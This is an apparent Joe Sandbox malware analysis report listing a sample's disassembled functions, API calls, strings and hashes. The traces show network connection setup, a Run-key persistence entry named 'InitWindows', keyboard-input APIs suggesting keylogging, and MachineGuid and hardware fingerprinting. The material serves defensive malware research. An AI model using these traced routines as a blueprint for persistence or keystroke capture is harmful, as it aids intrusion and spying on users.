Function 00406871 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85
networklibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040415D: lstrcatA.KERNEL32(00000000,75A901C0,?,00000000,?,004045D8,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 00404189

Part of subcall function 00414047: WaitForSingleObject.KERNEL32(?,000000FF,0040689B,75A901C0,?,?,00000000,00405EAB,?,?,?,?,?,?,75A901C0,00000000), ref: 0041404B

getaddrinfo.WS2_32(75A901C0,00000000,00405EAB,00000000), ref: 004068C6
socket.WS2_32(00000002,00000001,00000000), ref: 004068DD
htons.WS2_32(?), ref: 00406903
freeaddrinfo.WS2_32(00000000), ref: 00406913
LoadLibraryA.KERNEL32(Ws2_32.dll), ref: 0040691E
GetProcAddress.KERNEL32(00000000,connect), ref: 0040692A
WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 0040693C
ReleaseMutex.KERNEL32(?), ref: 00406966

Strings

Ws2_32.dll, xrefs: 00406919
connect, xrefs: 00406924

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressConnectLibraryLoadMutexObjectProcReleaseSingleWaitfreeaddrinfogetaddrinfohtonslstrcatsocket
String ID: Ws2_32.dll$connect
API String ID: 1082650224-3440391005
Opcode ID: 1a39b79a3a206967053719c54eb063e1f66e3f3a179c5117f32b35eb29b7f02d
Instruction ID: 47f1e551ddaa6e663d71b28ddfada56d28640d5f4bf8ed1f0f86a7640baf4aef
Opcode Fuzzy Hash: 1a39b79a3a206967053719c54eb063e1f66e3f3a179c5117f32b35eb29b7f02d
Instruction Fuzzy Hash: 9331327194020ABFDB009F65DC88EEABBB8FF08314F10862AF925A6190D7749D50CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD63 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD6F
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD86
EnterCriticalSection.KERNEL32(00552B20,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD92
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BDA2
LeaveCriticalSection.KERNEL32(00552B20), ref: 0040BDF5

Part of subcall function 00402746: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040275B

Strings

l+U, xrefs: 0040BDB7
d+U, xrefs: 0040BDE0
+U, xrefs: 0040BD7B
+U, xrefs: 0040BD8C
D>@, xrefs: 0040BD98

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
String ID: +U$ +U$D>@$d+U$l+U
API String ID: 2964645253-1982427742
Opcode ID: 4b6ad45659fd2897d04b1c0f663b8cb3940e22fbe4f13e0dd5644ab804c7044c
Instruction ID: 265cd3b4c77da1484a4f346472f3ffb19b7f88f47f7463221fca22f9c74c6dea
Opcode Fuzzy Hash: 4b6ad45659fd2897d04b1c0f663b8cb3940e22fbe4f13e0dd5644ab804c7044c
Instruction Fuzzy Hash: DB01B531900200ABC700AF659C6DBDF3FA9FB42322F00803BF905672D0D7B85888DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041529E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 177
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413893: GetCurrentProcess.KERNEL32(00000008,00000000,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138A5
Part of subcall function 00413893: OpenProcessToken.ADVAPI32(00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138AC
Part of subcall function 00413893: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138CA
Part of subcall function 00413893: FindCloseChangeNotification.KERNEL32(00000000,?,75A901C0), ref: 004138DF

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 004042C5: lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

RegOpenKeyExW.KERNEL32(80000001,?,00000000,000F003F,?,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,00417610,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610), ref: 00415376

Part of subcall function 00413960: EntryPoint.DBKYOVYK(000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 0041396D
Part of subcall function 00413960: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610), ref: 00413981

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

CharLowerW.USER32(00417610,00000000,\Documents:ApplicationData,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004153E1
CharLowerW.USER32(?,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004153E8
lstrcmpW.KERNEL32(00000000,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004153EC

Strings

Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00415349
inst, xrefs: 0041530D
InitWindows, xrefs: 0041532B
\Documents:ApplicationData, xrefs: 004153B3
Software\Microsoft\Windows\CurrentVersion\Explorer\, xrefs: 004152C3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcpy$CharLowerOpenProcessTokenlstrlen$ChangeCloseCurrentEntryFileFindFolderFreeInformationModuleNameNotificationPathPointSpecialVirtuallstrcatlstrcmp
String ID: InitWindows$Software\Microsoft\Windows\CurrentVersion\Explorer\$Software\Microsoft\Windows\CurrentVersion\Run\$\Documents:ApplicationData$inst
API String ID: 746058950-1325404801
Opcode ID: 371e9c14fad32a99c174ee9c96f7e9378c877fbd363253ceb0e29bd6770f0f45
Instruction ID: a422cc8d7b5ffa6c0d939dc066cbd4f60cdeaa8681062c1cc42b8bb1f8ec04d7
Opcode Fuzzy Hash: 371e9c14fad32a99c174ee9c96f7e9378c877fbd363253ceb0e29bd6770f0f45
Instruction Fuzzy Hash: 075185B1A00105ABCB04EF51C892EEE7B75AF94349F01016EB9067B1D2DF78AA85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004134A0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004134B7
CoInitialize.OLE32(00000000), ref: 004134BE
CoCreateInstance.OLE32(00419380,00000000,00000017,0041C2E0,?,?,?,?,?,?,?,?,?,00403D33), ref: 004134DC
VariantInit.OLEAUT32(?), ref: 00413560

Strings

SELECT Name FROM Win32_VideoController, xrefs: 0041352E
WQL, xrefs: 00413538
Name, xrefs: 00413572
3=@, xrefs: 004134E9, 00413524, 004135B2, 0041354E, 004134EC, 0041350E, 0041353D, 004135B5
root\CIMV2, xrefs: 004134FC

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Initialize$CreateInitInstanceSecurityVariant
String ID: 3=@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
API String ID: 2382742315-1477256124
Opcode ID: 59be42f0de6a7a2a9d17efc75bb1b659558e5e5e0e5e4a5152408af85721bb0a
Instruction ID: 1b0935cb0faf4213f4311fe04d2166f1547f4ab651c0267db9a4f61794ba06ec
Opcode Fuzzy Hash: 59be42f0de6a7a2a9d17efc75bb1b659558e5e5e0e5e4a5152408af85721bb0a
Instruction Fuzzy Hash: 6A411B70A40208BBCB14CF95CC88EEFBBB9EFC9B15B10459DF515E7290D675AA41CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE01 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00552B20,?,0040131A), ref: 0040BE2C
LoadLibraryW.KERNEL32(User32.dll,?,0040131A), ref: 0040BE57

Part of subcall function 0041473A: lstrcmpA.KERNEL32(?,E[A,?,74DF0F00,00415B45), ref: 00414773

Strings

MapVirtualKeyA, xrefs: 0040BE7D
User32.dll, xrefs: 0040BE45
GetRawInputData, xrefs: 0040BE5F
ToUnicode, xrefs: 0040BE6C
L+U, xrefs: 0040BE32

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalInitializeLibraryLoadSectionlstrcmp
String ID: GetRawInputData$L+U$MapVirtualKeyA$ToUnicode$User32.dll
API String ID: 4274177235-4200824155
Opcode ID: c25320c9a6b7c87c07d0ab8d78373c794bc264e7b279f9cecb858fbd0f0ca1de
Instruction ID: 220de8a5388af2fbc1c87ec7854e8e6c29bda84cf1a750c42cfa688fada8185d
Opcode Fuzzy Hash: c25320c9a6b7c87c07d0ab8d78373c794bc264e7b279f9cecb858fbd0f0ca1de
Instruction Fuzzy Hash: 47016771E407104BC355AF2569B55893FE1E7AB726F10812FE405873B0EB7409CA9BCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041699C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004169AB
CoCreateInstance.OLE32(00419420,00000000,00000001,0041C870,?,?,?,?,00416FE3,?,?,?,004162A2), ref: 004169CB
VariantInit.OLEAUT32(?), ref: 00416A27
CoUninitialize.OLE32(?,00000000,00000000,004193A0,?,?,?,?,00416FE3,?,?,?,004162A2), ref: 00416AED

Strings

FriendlyName, xrefs: 00416A4C
Description, xrefs: 00416A35

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateInitInitializeInstanceUninitializeVariant
String ID: Description$FriendlyName
API String ID: 4142528535-3192352273
Opcode ID: e5224d3d1ec49d83ba7ea9d9d36c8d2239385b99ec5bfa701e7709760cbd6bae
Instruction ID: ddf15439b7db59c5a35889e95ea0770f56ed21d4a424302438ecf1268633d2e0
Opcode Fuzzy Hash: e5224d3d1ec49d83ba7ea9d9d36c8d2239385b99ec5bfa701e7709760cbd6bae
Instruction Fuzzy Hash: 5D417C74A00205AFCB24DFA5C888DEEBBB9EF89744B15849EE405EB250DB74DD81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00403D11 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004135D1: EntryPoint.DBKYOVYK(00000200), ref: 00413669

Part of subcall function 004134A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004134B7
Part of subcall function 004134A0: CoInitialize.OLE32(00000000), ref: 004134BE
Part of subcall function 004134A0: CoCreateInstance.OLE32(00419380,00000000,00000017,0041C2E0,?,?,?,?,?,?,?,?,?,00403D33), ref: 004134DC

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403D42

Part of subcall function 00415E27: EntryPoint.DBKYOVYK(02800000,?,?,00000000,?,?,00417531), ref: 00415E37
Part of subcall function 00415E27: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00417531), ref: 00415E54
Part of subcall function 00415E27: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00417531), ref: 00415E67
Part of subcall function 00415E27: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00417531), ref: 00415E78
Part of subcall function 00415E27: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,00417531), ref: 00415E85

Part of subcall function 004136A5: GlobalMemoryStatusEx.KERNEL32(?), ref: 004136B6

Part of subcall function 004138EF: GetCurrentProcess.KERNEL32(?,?,00403D7B,000010AD,?), ref: 004138F3

Part of subcall function 00413893: GetCurrentProcess.KERNEL32(00000008,00000000,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138A5
Part of subcall function 00413893: OpenProcessToken.ADVAPI32(00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138AC
Part of subcall function 00413893: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138CA
Part of subcall function 00413893: FindCloseChangeNotification.KERNEL32(00000000,?,75A901C0), ref: 004138DF

Part of subcall function 004136C8: LoadLibraryA.KERNEL32(ntdll.dll), ref: 004136E0
Part of subcall function 004136C8: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004136F0

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004139AD: GetComputerNameW.KERNEL32(00403DBD,00000010), ref: 004139D0

Part of subcall function 004139E7: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,00000000,00000000,00000000,?,00000000,?,?,?), ref: 00413A2C
Part of subcall function 004139E7: RegCloseKey.KERNEL32(?,00000000,MachineGuid,?,?,?), ref: 00413A6D
Part of subcall function 004139E7: RegCloseKey.ADVAPI32(00000000,005530B8,00000000,00000000,00000000,?,00000000,?), ref: 00413ABC

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00403E16
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00403E28
CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00403E36

Part of subcall function 0040BD63: InitializeCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD6F
Part of subcall function 0040BD63: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD86
Part of subcall function 0040BD63: EnterCriticalSection.KERNEL32(00552B20,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BD92
Part of subcall function 0040BD63: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,00403E44,?,00000001,?,?), ref: 0040BDA2
Part of subcall function 0040BD63: LeaveCriticalSection.KERNEL32(00552B20), ref: 0040BDF5

Strings

\Microsoft Vision\, xrefs: 00403E1C
|/@, xrefs: 00403E47

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseCriticalFileSection$CreateInitializeProcess$ChangeCurrentEntryFindModuleNameNotificationOpenPointTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
String ID: \Microsoft Vision\$|/@
API String ID: 2128561451-4251672665
Opcode ID: 2cdde9588449b4b665b337df7a2b347ede8343f851d119181f068c855e964e04
Instruction ID: 7ae07a7a3e92446de92c7f4ab3de76698900cd1dbab90516c93410e806be4547
Opcode Fuzzy Hash: 2cdde9588449b4b665b337df7a2b347ede8343f851d119181f068c855e964e04
Instruction Fuzzy Hash: 47316FB1E00218BBCB14EFA1DC56DEEBB78EF44305F00446EB105A6191DA785A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,005530B8,00000000,00000000,00000000,?,00000000,?), ref: 00413ABC

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,00000000,00000000,00000000,?,00000000,?,?,?), ref: 00413A2C

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,00000000,?,?,?,?,0041543B,?,?,00000000), ref: 00414D9B
Part of subcall function 00414D78: EntryPoint.DBKYOVYK(00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 00414DA8
Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000), ref: 00414DBF

RegCloseKey.KERNEL32(?,00000000,MachineGuid,?,?,?), ref: 00413A6D

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00413A0E
MachineGuid, xrefs: 00413A47

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseQueryValuelstrlen$EntryFreeOpenPointVirtuallstrcpy
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1545312243-1211650757
Opcode ID: 5bf23b767d730a00e91358281c8d735662b56c15cf2820de4d60e83bc0304896
Instruction ID: c374202d8c7f88b8549515ecb15243430a55d02fe12970550f8a20b1234e22c7
Opcode Fuzzy Hash: 5bf23b767d730a00e91358281c8d735662b56c15cf2820de4d60e83bc0304896
Instruction Fuzzy Hash: 6E219271900209EBCB01EF95C9558EEFBB8AF90345B10017FA406B32A1DB781F49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415E27 Relevance: 7.5, APIs: 5, Instructions: 48fileCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(02800000,?,?,00000000,?,?,00417531), ref: 00415E37

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00417531), ref: 00415E54
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00417531), ref: 00415E67
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00417531), ref: 00415E78
FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,00417531), ref: 00415E85

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateChangeCloseCreateEntryFindNotificationPointProcessReadSize
String ID:
API String ID: 2270256920-0
Opcode ID: 17ae8c2186a9f10b97960b179a2002f189a332c1fd37bae62bc35ffacafa1be8
Instruction ID: 0c3d4b1953f2519aeef21cd5b4fa338d2c2ac421618056251a0055bf01d7070c
Opcode Fuzzy Hash: 17ae8c2186a9f10b97960b179a2002f189a332c1fd37bae62bc35ffacafa1be8
Instruction Fuzzy Hash: 85F04FB2A11211BFF3205B259C49FFB779CDB55765F204135F941E62C0E7B45D4086A8

Uniqueness

Uniqueness Score: -1.00%

Function 00415E26 Relevance: 7.5, APIs: 5, Instructions: 48fileCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(02800000,?,?,00000000,?,?,00417531), ref: 00415E37

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00417531), ref: 00415E54
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00417531), ref: 00415E67
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00417531), ref: 00415E78
FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,00417531), ref: 00415E85

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateChangeCloseCreateEntryFindNotificationPointProcessReadSize
String ID:
API String ID: 2270256920-0
Opcode ID: 1e7c756747ad9fa2b15e1d45f5e2d8602bc6f71f24101b9acd49877b2d8e7908
Instruction ID: 9b2c42a9638af6624a80233b3644600133f50bdecfd3208cfded084907a0f55a
Opcode Fuzzy Hash: 1e7c756747ad9fa2b15e1d45f5e2d8602bc6f71f24101b9acd49877b2d8e7908
Instruction Fuzzy Hash: BAF0C2B2A01211BFF3205B34AC49FFB77ACDB55365F204239F941E22C0E7B44D408668

Uniqueness

Uniqueness Score: -1.00%

Function 004040D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 004040C4: lstrlenA.KERNEL32(00000000,004040EC,75A901C0,00000000,00000000,+E@,0040443F,?,+E@,-00000001,75A901C0,?,0040452B,00000000), ref: 004040CB

MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,75A901C0,00000000,00000000,+E@,0040443F,?,+E@,-00000001,75A901C0), ref: 00404102
EntryPoint.DBKYOVYK(00000000,?,0040452B,00000000,?,?,75A901C0,?), ref: 0040410D

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,0040452B,00000000,?,?,75A901C0,?), ref: 0040412D

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Strings

+E@, xrefs: 004040D5

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$lstrlen$ByteCharFreeMultiProcessWidelstrcpy$AllocateEntryPointVirtual
String ID: +E@
API String ID: 1253088374-814451395
Opcode ID: 7433851d96b786e93460eab9cb1038e695397f2b53f6e32879f08838f1e75230
Instruction ID: 4db7af58a63476bdfb43cabb757b68a0ebc64f03b132b4b3dc262949609c4d8e
Opcode Fuzzy Hash: 7433851d96b786e93460eab9cb1038e695397f2b53f6e32879f08838f1e75230
Instruction Fuzzy Hash: AD018471601114BBCB14EBA5DC96DDE77689F49354B10457AF605BB2D1CA388D0087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00417761 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00417798
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004177AA

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

;, xrefs: 004177C2
\Microsoft Vision\, xrefs: 0041779E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

